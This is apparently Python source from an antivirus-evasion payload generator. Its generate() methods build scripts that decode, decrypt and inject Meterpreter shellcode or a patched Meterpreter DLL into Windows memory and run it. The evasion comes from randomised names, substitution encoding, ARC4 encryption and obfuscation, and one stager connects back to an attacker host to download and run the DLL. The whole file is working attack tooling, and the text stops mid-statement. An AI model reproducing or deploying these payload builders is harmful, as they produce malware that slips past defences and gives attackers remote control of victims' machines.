def generate(self): if os.path.exists(settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"): metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll" else: print "[*] Error: You either do not have the latest version of Metasploit or" print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file." print "[*] Error: Please fix either issue then select this payload again!" sys.exit() f = open(metsrvPath, 'rb') meterpreterDll = f.read() f.close() # lambda function used for patching the metsvc.dll dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):] # patch the metsrv.dll header headerPatch = helpers.selfcontained_patch() meterpreterDll = dllReplace(meterpreterDll,0,headerPatch) # patch in the default user agent string userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00") userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00" meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString) # turn off SSL sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL") sslString = "METERPRETER_TRANSPORT_HTTP\x00" meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString) # replace the URL/port of the handler urlIndex = meterpreterDll.index("https://" + ("X" * 256)) urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00" meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString) # replace the expiration timeout with the default value of 300 expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661)) expirationTimeout = struct.pack('<I', 604800) meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout) # replace the communication timeout with the default value of 300 communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f)) communicationTimeout = struct.pack('<I', 300) meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout) # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" # traditional void pointer injection if self.required_options["inject_method"][0].lower() == "void": # doing void * cast payloadCode += "from ctypes import *\nimport base64,zlib\n" randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n" randVarName = helpers.randomString() randFuncName = helpers.randomString() payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n" payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n" payloadCode += randFuncName+"()\n" # VirtualAlloc() injection else: payloadCode += 'import ctypes,base64,zlib\n' randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() randPtr = helpers.randomString() randBuf = helpers.randomString() randHt = helpers.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n" payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n" payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n' payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n' payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode
def generate(self): #Random letter substition variables hex_letters = "abcdef" non_hex_letters = "ghijklmnopqrstuvwxyz" encode_with_this = random.choice(hex_letters) decode_with_this = random.choice(non_hex_letters) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names subbed_shellcode_variable_name = helpers.randomString() shellcode_variable_name = helpers.randomString() rand_ptr = helpers.randomString() rand_buf = helpers.randomString() rand_ht = helpers.randomString() rand_decoded_letter = helpers.randomString() rand_correct_letter = helpers.randomString() rand_sub_scheme = helpers.randomString() # Create Letter Substitution Scheme sub_scheme = string.maketrans(encode_with_this, decode_with_this) # Escaping Shellcode Shellcode = Shellcode.encode("string_escape") if self.required_options["INJECT_METHOD"][0].lower() == "virtual": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Create Payload File payload_code = 'import ctypes as avlol\n' payload_code += 'from string import maketrans\n' payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n' payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n' payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n' payload_code += rand_ptr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + shellcode_variable_name + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n' payload_code += rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n' payload_code += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n' payload_code += rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' payload_code += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) return payload_code else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Extra Variables RandToday = helpers.randomString() RandExpire = helpers.randomString() # Create Payload File payload_code = 'import ctypes as avlol\n' payload_code += 'from string import maketrans\n' payload_code += 'from datetime import datetime\n' payload_code += 'from datetime import date\n\n' payload_code += RandToday + ' = datetime.now()\n' payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n' payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += '\t' + rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n' payload_code += '\t' + subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n' payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n' payload_code += '\t' + rand_ptr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + shellcode_variable_name + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n' payload_code += '\t' + rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n' payload_code += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n' payload_code += '\t' + rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' payload_code += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) return payload_code if self.required_options["INJECT_METHOD"][0].lower() == "heap": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": HeapVar = helpers.randomString() # Create Payload File payload_code = 'import ctypes as avlol\n' payload_code += 'from string import maketrans\n' payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n' payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n' payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n' payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n' payload_code += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + shellcode_variable_name + ') * 2),avlol.c_int(0))\n' payload_code += rand_ptr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + shellcode_variable_name + ')))\n' payload_code += rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n' payload_code += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n' payload_code += rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' payload_code += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) return payload_code else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Extra Variables RandToday = helpers.randomString() RandExpire = helpers.randomString() HeapVar = helpers.randomString() # Create Payload File payload_code = 'import ctypes as avlol\n' payload_code += 'from string import maketrans\n' payload_code += 'from datetime import datetime\n' payload_code += 'from datetime import date\n\n' payload_code += RandToday + ' = datetime.now()\n' payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n' payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += '\t' + rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n' payload_code += '\t' + subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n' payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n' payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n' payload_code += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + shellcode_variable_name + ') * 2),avlol.c_int(0))\n' payload_code += '\t' + rand_ptr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + shellcode_variable_name + ')))\n' payload_code += '\t' + rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n' payload_code += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n' payload_code += '\t' + rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' payload_code += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) return payload_code else: if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": #Additional random variable names rand_reverse_shell = helpers.randomString() rand_memory_shell = helpers.randomString() rand_shellcode = helpers.randomString() # Create Payload File payload_code = 'from ctypes import *\n' payload_code += 'from string import maketrans\n' payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n' payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n' payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n' payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n' payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n' payload_code += rand_shellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) return payload_code else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Extra Variables RandToday = helpers.randomString() RandExpire = helpers.randomString() #Additional random variable names rand_reverse_shell = helpers.randomString() rand_memory_shell = helpers.randomString() rand_shellcode = helpers.randomString() # Create Payload File payload_code = 'from ctypes import *\n' payload_code += 'from string import maketrans\n' payload_code += 'from datetime import datetime\n' payload_code += 'from datetime import date\n\n' payload_code += RandToday + ' = datetime.now()\n' payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n' payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += '\t' + rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n' payload_code += '\t' + subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n' payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n' payload_code += '\t' + rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n' payload_code += '\t' + rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n' payload_code += '\t' + rand_shellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) return payload_code
def generate(self): # randomize all of the variable names used shellCodeName = helpers.randomString() socketName = helpers.randomString() intervalName = helpers.randomString() attemptsName = helpers.randomString() getDataMethodName = helpers.randomString() fdBufName = helpers.randomString() rcvStringName = helpers.randomString() rcvCStringName = helpers.randomString() injectMethodName = helpers.randomString() tempShellcodeName = helpers.randomString() shellcodeBufName = helpers.randomString() fpName = helpers.randomString() tempCBuffer = helpers.randomString() payloadCode = "import struct, socket, binascii, ctypes, random, time\n" # socket and shellcode variables that need to be kept global payloadCode += "%s, %s = None, None\n" % (shellCodeName, socketName) # build the method that creates a socket, connects to the handler, # and downloads/patches the meterpreter .dll payloadCode += "def %s():\n" % (getDataMethodName) payloadCode += "\ttry:\n" payloadCode += "\t\tglobal %s\n" % (socketName) # build the socket and connect to the handler payloadCode += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % ( socketName) payloadCode += "\t\t%s.connect(('%s', %s))\n" % ( socketName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) # pack the underlying socket file descriptor into a c structure payloadCode += "\t\t%s = struct.pack('<i', %s.fileno())\n" % ( fdBufName, socketName) # unpack the length of the payload, received as a 4 byte array from the handler payloadCode += "\t\tl = struct.unpack('<i', str(%s.recv(4)))[0]\n" % ( socketName) payloadCode += "\t\t%s = \" \"\n" % (rcvStringName) # receive ALL of the payload .dll data payloadCode += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % ( rcvStringName, rcvStringName, socketName) payloadCode += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % ( rcvCStringName, rcvStringName, rcvStringName) # prepend a little assembly magic to push the socket fd into the edi register payloadCode += "\t\t%s[0] = binascii.unhexlify('BF')\n" % ( rcvCStringName) # copy the socket fd in payloadCode += "\t\tfor i in xrange(4): %s[i+1] = %s[i]\n" % ( rcvCStringName, fdBufName) payloadCode += "\t\treturn %s\n" % (rcvCStringName) payloadCode += "\texcept: return None\n" # build the method that injects the .dll into memory payloadCode += "def %s(%s):\n" % (injectMethodName, tempShellcodeName) payloadCode += "\tif %s != None:\n" % (tempShellcodeName) payloadCode += "\t\t%s = bytearray(%s)\n" % (shellcodeBufName, tempShellcodeName) # allocate enough virtual memory to stuff the .dll in payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" % ( fpName, shellcodeBufName) # virtual lock to prevent the memory from paging out to disk payloadCode += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" % ( fpName, shellcodeBufName) payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" % ( tempCBuffer, shellcodeBufName, shellcodeBufName) # copy the .dll into the allocated memory payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" % ( fpName, tempCBuffer, shellcodeBufName) # kick the thread off to execute the .dll payloadCode += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" % ( fpName) # wait for the .dll execution to finish payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n" # set up expiration options if specified if self.required_options["expire_payload"][0].lower() == "x": # download the stager payloadCode += "%s = %s()\n" % (shellCodeName, getDataMethodName) # inject what we grabbed payloadCode += "%s(%s)\n" % (injectMethodName, shellCodeName) else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["expire_payload"][0]))) randToday = helpers.randomString() randExpire = helpers.randomString() payloadCode += 'from datetime import datetime\n' payloadCode += 'from datetime import date\n\n' payloadCode += randToday + ' = datetime.now()\n' payloadCode += randExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' payloadCode += 'if ' + randToday + ' < ' + randExpire + ':\n' # download the stager payloadCode += "\t%s = %s()\n" % (shellCodeName, getDataMethodName) # inject what we grabbed payloadCode += "\t%s(%s)\n" % (injectMethodName, shellCodeName) if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode
def generate(self): # get the main meterpreter .dll with the header/loader patched meterpreterDll = patch.headerPatch() # turn off SSL meterpreterDll = patch.patchTransport(meterpreterDll, False) # replace the URL urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00" meterpreterDll = patch.patchURL(meterpreterDll, urlString) # replace in the UA meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00") # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" # traditional void pointer injection if self.required_options["inject_method"][0].lower() == "void": # doing void * cast payloadCode += "from ctypes import *\nimport base64,zlib\n" randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n" randVarName = helpers.randomString() randFuncName = helpers.randomString() payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n" payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n" payloadCode += randFuncName+"()\n" # VirtualAlloc() injection else: payloadCode += 'import ctypes,base64,zlib\n' randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() randPtr = helpers.randomString() randBuf = helpers.randomString() randHt = helpers.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n" payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n" payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n' payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n' payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode
def generate(self): if self.required_options["INJECT_METHOD"][0].lower() == "virtual": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandARCKey = helpers.randomString() RandARCPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'import ctypes as avlol\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n' PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandARCKey = helpers.randomString() RandARCPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'import ctypes as avlol\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n' PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n' PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n' PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["INJECT_METHOD"][0].lower() == "heap": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandARCKey = helpers.randomString() RandARCPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() HeapVar = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'import ctypes as avlol\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n' PayloadCode += RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 